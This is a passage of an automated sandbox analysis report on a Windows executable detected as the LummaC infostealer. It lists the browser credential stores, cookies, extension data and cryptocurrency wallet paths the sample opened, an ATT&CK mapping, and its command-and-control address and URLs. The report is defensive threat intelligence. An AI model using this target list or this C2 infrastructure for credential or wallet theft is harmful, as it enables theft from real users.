Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match

File source: Process Memory Space: OlZzqwjrwO.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 0.3.OlZzqwjrwO.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OlZzqwjrwO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OlZzqwjrwO.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OlZzqwjrwO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OlZzqwjrwO.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Native API	1 LSASS Driver	1 Process Injection	32 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 LSASS Driver	1 Process Injection	LSASS Memory	471 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	32 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	113 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
OlZzqwjrwO.exe	89%	ReversingLabs	Win32.Trojan.Smokeloader
OlZzqwjrwO.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://94.158.244.69/wbBA	0%	Avira URL Cloud	safe
http://94.158.244.69/tFkr	0%	Avira URL Cloud	safe
http://94.158.244.69/nQ	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sock0LfNn/Fbj	0%	Avira URL Cloud	safe
http://94.158.244.69/c2socks~	0%	Avira URL Cloud	safe
http://94.158.244.69/4NaI	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sockF	0%	Avira URL Cloud	safe
http://94.158.244.69/c2socks4	0%	Avira URL Cloud	safe
http://94.158.244.69/i	0%	Avira URL Cloud	safe
http://94.158.244.69/79Wd	0%	Avira URL Cloud	safe
http://94.158.244.69/PJf	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sockS	0%	Avira URL Cloud	safe
http://94.158.244.69/Jihk	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sock&	0%	Avira URL Cloud	safe
http://94.158.244.69/F	0%	Avira URL Cloud	safe
http://94.158.244.69/ZuKk	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://94.158.244.69/c2sock	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/nQ	OlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/wbBA	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/c2socks~	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/4NaI	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/c2sockF	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/c2socks4	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/tFkr	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/79Wd	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/i	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/c2sock0LfNn/Fbj	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/c2sockS	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/PJf	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/Jihk	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/c2sock&	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/F	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/ZuKk	OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.158.244.69	unknown	Moldova Republic of		39798	MIVOCLOUDMD	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555043
Start date and time:	2024-11-13 10:51:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OlZzqwjrwO.exe renamed because original name is a hash value
Original Sample Name:	0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 59 Number of non-executed functions: 110
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: OlZzqwjrwO.exe

Simulations

Behavior and APIs

Time	Type	Description
04:54:53	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.158.244.69	Vd3tOP5WSD.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	g1kWKm20Z5.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	cgln32y2HF.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	4Oq9i3gm0g.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	RX7nieXlNm.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	5M5e9srxkE.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	dV01QsYySM.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	BeO2C8S5Ly.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	ToNaCrWjm7.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	IVN6n1kO22.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	Mc8s3us2xa.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.45
	https://wmrc.titurimplec.com/HA02SW/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://shorturl.at/gHbMJ	Get hash	malicious	Unknown	Browse	13.107.246.45
	REQ 2024 xlx.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	13.107.246.45
	58751534976167198.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DNnGv_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA92MMGG0eeFCZzQMnosAWydLTI7R4yQPl90fJpGVjewvRcCF77tY5-2B3PAHwq6SU-2Fc2kSK8E1mMumIEdp0dsw2BfptVK6-2FXO4Hh-2FAV8-2FJ5YFUs6qp3oyRx3LiWrBnDVYrVE-3D	Get hash	malicious	Unknown	Browse	13.107.246.45
	new.bat	Get hash	malicious	Unknown	Browse	13.107.246.45
	txt2.bat	Get hash	malicious	Unknown	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MIVOCLOUDMD	Vd3tOP5WSD.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	g1kWKm20Z5.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	cgln32y2HF.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	4Oq9i3gm0g.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	RX7nieXlNm.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	5M5e9srxkE.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	dV01QsYySM.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	BeO2C8S5Ly.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	ToNaCrWjm7.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	IVN6n1kO22.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_OlZzqwjrwO.exe_4fdcd3b2b921635830a475eceee09d6edfdd598_6c3c4747_a375bc04-6242-4226-8397-353148cc3996\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8431093415846114
Encrypted:	false
SSDEEP:	192:/PK5yLt9ce50UhsFO5RQR9jGdzuiF+Z24IO8AXRDX:Hn9EUhsFOajEzuiF+Y4IO8A
MD5:	32910EB66ED416C0584D1091D347E7EF
SHA1:	605E500041379F26456632E38CFB9021EA569CB8
SHA-256:	2B1B52832A7896F371D3AD1BC043B3B2F721B4A719499F2F776324A911E9F151
SHA-512:	E4013C007CC1053C876842AEA7A36BF3B0E8238BC6B34A5E2A9131D58F44DBF4E00383D8E6A7C29C52EC317C39894F9820ED7A419DF7B3C94DA3B49EAC03E525
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.6.5.2.8.8.7.0.9.8.7.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.6.5.2.8.9.0.5.3.6.2.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.7.5.b.c.0.4.-.6.2.4.2.-.4.2.2.6.-.8.3.9.7.-.3.5.3.1.4.8.c.c.3.9.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.a.9.2.5.e.1.-.2.9.8.b.-.4.b.f.e.-.9.f.9.d.-.b.d.b.7.8.2.a.d.a.d.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.l.Z.z.q.w.j.r.w.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.0.-.0.0.0.1.-.0.0.1.4.-.9.f.6.d.-.c.b.a.c.b.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.0.7.8.5.3.e.1.2.0.f.6.b.b.e.b.f.c.0.8.0.e.1.6.9.5.7.a.7.b.4.a.0.0.0.0.1.1.4.1.!.0.0.0.0.f.d.4.4.e.2.5.1.a.8.9.8.8.5.5.a.6.c.5.5.e.6.f.b.d.1.e.e.b.b.d.8.0.7.8.9.8.0.5.2.!.O.l.Z.z.q.w.j.r.w.O...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER504.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Nov 13 09:54:48 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	41004
Entropy (8bit):	2.491680324721428
Encrypted:	false
SSDEEP:	192:H7rX4+oNN8/OSpLdYF2yMbQAQqZGutXvif+ZNUnaTM3:YnXxSpLdYIuvk/tfq+ZNUaTM3
MD5:	49D7F205C22A6434246A2F2E2E0B0E48
SHA1:	F7A8FDB1CD18E9A5BB676E4B0748347E9B3835F5
SHA-256:	4E7B28E3EC2BC69BC946DA4001AAA28B04CD30FD9E136DD01991510B5BC628DC
